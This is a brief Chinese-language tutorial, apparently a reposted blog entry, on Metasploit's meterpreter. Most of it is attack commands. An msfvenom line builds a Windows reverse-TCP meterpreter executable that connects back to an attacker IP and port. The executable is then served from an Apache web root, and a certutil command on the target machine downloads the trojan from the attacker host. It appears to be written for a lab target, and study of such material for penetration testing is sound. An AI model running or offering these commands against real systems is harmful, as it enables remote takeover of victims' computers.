作者:mobiledu2502890451 | 来源:互联网 | 2023-09-16 10:35
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作首先,我们使用metasploit中的另一个后门工
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=1234 -f exe -o /root/shell.exe

在/root目录生成了一个shell.exe文件,执行该程序回连地址为172.16.1.103端口为1234的木马
共享到windows电脑
service apache2 start
打开Web服务
cp /root/shell.exe /var/www/html/
,拷贝到Web服务目录

在靶机中执行命令下载木马到C:\
根目录并使用dir
查看
certutil -urlcache -split -f http://172.16.1.103/shell.exe C:\shell.exe
